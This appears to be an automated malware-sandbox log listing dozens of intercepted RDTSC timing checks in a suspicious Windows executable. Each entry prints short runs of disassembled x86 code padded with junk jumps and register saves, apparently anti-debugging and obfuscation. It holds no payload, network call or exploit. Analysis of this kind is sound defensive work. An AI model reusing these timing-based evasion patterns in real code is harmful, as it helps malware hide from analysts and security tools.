Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77505C2 second address: 7750641 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6FA52293C8h 0x00000008 pushfd 0x00000009 jmp 00007F6FA52293C2h 0x0000000e adc ah, 00000068h 0x00000011 jmp 00007F6FA52293BBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+1Ch], eax 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F6FA52293C4h 0x00000024 and al, FFFFFFC8h 0x00000027 jmp 00007F6FA52293BBh 0x0000002c popfd 0x0000002d movzx eax, di 0x00000030 popad 0x00000031 mov eax, dword ptr [ebx+5Ch] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F6FA52293BEh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750641 second address: 77506F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA452481Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+20h], eax 0x0000000c jmp 00007F6FA4524826h 0x00000011 mov eax, dword ptr [ebx+60h] 0x00000014 pushad 0x00000015 jmp 00007F6FA452481Eh 0x0000001a jmp 00007F6FA4524822h 0x0000001f popad 0x00000020 mov dword ptr [esi+24h], eax 0x00000023 jmp 00007F6FA4524820h 0x00000028 mov eax, dword ptr [ebx+64h] 0x0000002b jmp 00007F6FA4524820h 0x00000030 mov dword ptr [esi+28h], eax 0x00000033 jmp 00007F6FA4524820h 0x00000038 mov eax, dword ptr [ebx+68h] 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007F6FA452481Dh 0x00000044 xor ecx, 48726766h 0x0000004a jmp 00007F6FA4524821h 0x0000004f popfd 0x00000050 mov esi, 67962B97h 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77506F9 second address: 77506FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77506FF second address: 7750703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750703 second address: 7750714 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+2Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750714 second address: 7750718 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750718 second address: 775071E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775071E second address: 7750802 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6FA4524825h 0x00000009 jmp 00007F6FA452481Bh 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F6FA4524828h 0x00000015 and si, 83C8h 0x0000001a jmp 00007F6FA452481Bh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 mov ax, word ptr [ebx+6Ch] 0x00000027 pushad 0x00000028 mov edx, eax 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F6FA452481Eh 0x00000031 sbb ah, 00000028h 0x00000034 jmp 00007F6FA452481Bh 0x00000039 popfd 0x0000003a pushfd 0x0000003b jmp 00007F6FA4524828h 0x00000040 xor al, FFFFFF88h 0x00000043 jmp 00007F6FA452481Bh 0x00000048 popfd 0x00000049 popad 0x0000004a popad 0x0000004b mov word ptr [esi+30h], ax 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 push edx 0x00000053 pop eax 0x00000054 pushfd 0x00000055 jmp 00007F6FA4524827h 0x0000005a add esi, 1FE38D7Eh 0x00000060 jmp 00007F6FA4524829h 0x00000065 popfd 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750802 second address: 775083E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6FA52293C7h 0x00000009 or ax, 7F8Eh 0x0000000e jmp 00007F6FA52293C9h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775083E second address: 7750852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ax, word ptr [ebx+00000088h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750852 second address: 7750856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750856 second address: 775085C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775085C second address: 77508E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6FA52293BEh 0x00000008 push esi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov word ptr [esi+32h], ax 0x00000011 jmp 00007F6FA52293BCh 0x00000016 mov eax, dword ptr [ebx+0000008Ch] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F6FA52293BEh 0x00000023 add si, 5798h 0x00000028 jmp 00007F6FA52293BBh 0x0000002d popfd 0x0000002e mov ecx, 087E194Fh 0x00000033 popad 0x00000034 mov dword ptr [esi+34h], eax 0x00000037 pushad 0x00000038 movzx ecx, bx 0x0000003b mov bl, B6h 0x0000003d popad 0x0000003e mov eax, dword ptr [ebx+18h] 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 movsx edx, ax 0x00000047 pushfd 0x00000048 jmp 00007F6FA52293BAh 0x0000004d add esi, 1D525928h 0x00000053 jmp 00007F6FA52293BBh 0x00000058 popfd 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77508E0 second address: 77508E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77508E6 second address: 77508EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77508EA second address: 77508EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77508EE second address: 7750905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+38h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6FA52293BAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750905 second address: 7750996 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA452481Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+1Ch] 0x0000000c pushad 0x0000000d pushad 0x0000000e mov ax, 7C91h 0x00000012 movzx esi, bx 0x00000015 popad 0x00000016 mov ebx, 77FF7FCEh 0x0000001b popad 0x0000001c mov dword ptr [esi+3Ch], eax 0x0000001f jmp 00007F6FA4524825h 0x00000024 mov eax, dword ptr [ebx+20h] 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F6FA452481Ch 0x0000002e xor ax, 0048h 0x00000033 jmp 00007F6FA452481Bh 0x00000038 popfd 0x00000039 pushfd 0x0000003a jmp 00007F6FA4524828h 0x0000003f adc esi, 646342A8h 0x00000045 jmp 00007F6FA452481Bh 0x0000004a popfd 0x0000004b popad 0x0000004c mov dword ptr [esi+40h], eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750996 second address: 775099A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775099A second address: 77509A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77509A0 second address: 77509BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA52293C9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77509BD second address: 77509C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77509C1 second address: 7750A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+00000080h] 0x0000000e jmp 00007F6FA52293BDh 0x00000013 push 00000001h 0x00000015 pushad 0x00000016 mov ax, 5003h 0x0000001a pushfd 0x0000001b jmp 00007F6FA52293C8h 0x00000020 xor ecx, 698B29C8h 0x00000026 jmp 00007F6FA52293BBh 0x0000002b popfd 0x0000002c popad 0x0000002d nop 0x0000002e jmp 00007F6FA52293C6h 0x00000033 push eax 0x00000034 pushad 0x00000035 mov cl, dh 0x00000037 pushfd 0x00000038 jmp 00007F6FA52293BAh 0x0000003d jmp 00007F6FA52293C5h 0x00000042 popfd 0x00000043 popad 0x00000044 nop 0x00000045 jmp 00007F6FA52293BEh 0x0000004a lea eax, dword ptr [ebp-10h] 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F6FA52293C7h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750A77 second address: 7750A9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524829h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, 78h 0x0000000f push eax 0x00000010 pop ebx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750B22 second address: 7750B69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F7014A77F3Ah 0x0000000f jmp 00007F6FA52293BEh 0x00000014 mov eax, dword ptr [ebp-0Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a call 00007F6FA52293BDh 0x0000001f pop ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750B69 second address: 7750B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750B6E second address: 7750C01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6FA52293BAh 0x00000009 sub ax, 0CB8h 0x0000000e jmp 00007F6FA52293BBh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F6FA52293C8h 0x0000001a and ax, 4718h 0x0000001f jmp 00007F6FA52293BBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 mov dword ptr [esi+04h], eax 0x0000002b jmp 00007F6FA52293C6h 0x00000030 lea eax, dword ptr [ebx+78h] 0x00000033 jmp 00007F6FA52293C0h 0x00000038 push 00000001h 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F6FA52293C7h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750C01 second address: 7750C50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6FA452481Fh 0x00000009 jmp 00007F6FA4524823h 0x0000000e popfd 0x0000000f jmp 00007F6FA4524828h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b movsx ebx, cx 0x0000001e mov esi, 4C02B2E5h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750C50 second address: 7750C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA52293BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750C62 second address: 7750C66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750C66 second address: 7750C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dx, 960Eh 0x00000010 mov si, bx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750C7A second address: 7750C93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524820h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750C93 second address: 7750CC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov ah, 9Ah 0x00000007 popad 0x00000008 lea eax, dword ptr [ebp-08h] 0x0000000b pushad 0x0000000c mov eax, edi 0x0000000e mov dl, 5Ch 0x00000010 popad 0x00000011 nop 0x00000012 jmp 00007F6FA52293C4h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750CC0 second address: 7750CDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524828h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750D1B second address: 7750DCA instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6FA52293C8h 0x00000008 adc ax, 2938h 0x0000000d jmp 00007F6FA52293BBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F6FA52293C8h 0x0000001b xor esi, 3A39A398h 0x00000021 jmp 00007F6FA52293BBh 0x00000026 popfd 0x00000027 popad 0x00000028 mov edi, eax 0x0000002a pushad 0x0000002b pushad 0x0000002c call 00007F6FA52293C1h 0x00000031 pop ecx 0x00000032 popad 0x00000033 popad 0x00000034 test edi, edi 0x00000036 jmp 00007F6FA52293C3h 0x0000003b js 00007F7014A77CCDh 0x00000041 pushad 0x00000042 mov edx, ecx 0x00000044 mov eax, 093BCE17h 0x00000049 popad 0x0000004a mov eax, dword ptr [ebp-04h] 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 jmp 00007F6FA52293BFh 0x00000055 movzx ecx, bx 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750DCA second address: 7750DEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+08h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6FA4524824h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750DEE second address: 7750E1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c jmp 00007F6FA52293C6h 0x00000011 push 00000001h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750E1E second address: 7750E3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524829h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750E3B second address: 7750E4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA52293BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750E4B second address: 7750E82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA452481Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d mov al, D0h 0x0000000f mov edx, 4030E3E4h 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6FA4524829h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750E82 second address: 7750E92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA52293BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750E92 second address: 7750E96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750E96 second address: 7750EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F6FA52293C7h 0x0000000e lea eax, dword ptr [ebp-18h] 0x00000011 pushad 0x00000012 mov dh, cl 0x00000014 push eax 0x00000015 push edx 0x00000016 mov ecx, ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750EC0 second address: 7750EDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524823h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750EDE second address: 7750EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750EE5 second address: 7750F02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA4524829h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750FBA second address: 7750FF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-14h] 0x0000000c jmp 00007F6FA52293BEh 0x00000011 mov ecx, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F6FA52293BAh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750FF8 second address: 7750FFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750FFC second address: 7751002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7751002 second address: 7751042 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, F2h 0x00000005 jmp 00007F6FA4524829h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+0Ch], eax 0x00000010 pushad 0x00000011 mov ebx, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 call 00007F6FA4524826h 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7751042 second address: 77510CB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6FA52293BBh 0x00000008 xor cx, FF2Eh 0x0000000d jmp 00007F6FA52293C9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov edx, 770206ECh 0x0000001b pushad 0x0000001c push eax 0x0000001d mov si, di 0x00000020 pop edi 0x00000021 call 00007F6FA52293C4h 0x00000026 jmp 00007F6FA52293C2h 0x0000002b pop esi 0x0000002c popad 0x0000002d mov eax, 00000000h 0x00000032 pushad 0x00000033 jmp 00007F6FA52293BCh 0x00000038 call 00007F6FA52293C2h 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77510CB second address: 7751169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 lock cmpxchg dword ptr [edx], ecx 0x0000000a pushad 0x0000000b jmp 00007F6FA452481Dh 0x00000010 pushad 0x00000011 mov di, si 0x00000014 pushfd 0x00000015 jmp 00007F6FA452481Ah 0x0000001a sbb eax, 65531BC8h 0x00000020 jmp 00007F6FA452481Bh 0x00000025 popfd 0x00000026 popad 0x00000027 popad 0x00000028 pop edi 0x00000029 pushad 0x0000002a mov al, 0Eh 0x0000002c jmp 00007F6FA4524821h 0x00000031 popad 0x00000032 test eax, eax 0x00000034 pushad 0x00000035 mov si, F1C3h 0x00000039 mov dx, cx 0x0000003c popad 0x0000003d jne 00007F7013D72DCBh 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007F6FA4524827h 0x0000004c add cx, 001Eh 0x00000051 jmp 00007F6FA4524829h 0x00000056 popfd 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7751169 second address: 775116E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775124E second address: 7751252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7751252 second address: 7751256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7751256 second address: 775125C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775125C second address: 77512B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007F6FA52293C5h 0x0000000b or eax, 06AE7946h 0x00000011 jmp 00007F6FA52293C1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [edx+08h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F6FA52293C8h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77512B1 second address: 77512B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77512B7 second address: 77512D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77512D2 second address: 77512D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77512D6 second address: 77512DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77512DC second address: 7751309 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524824h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+0Ch], eax 0x0000000c pushad 0x0000000d mov si, F0FDh 0x00000011 mov ax, 9FF9h 0x00000015 popad 0x00000016 mov eax, dword ptr [esi+10h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7751309 second address: 7751311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, si 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7751311 second address: 7751387 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524829h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+10h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F6FA4524823h 0x00000015 jmp 00007F6FA4524823h 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F6FA4524828h 0x00000021 or cx, 2CF8h 0x00000026 jmp 00007F6FA452481Bh 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7751387 second address: 775138E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
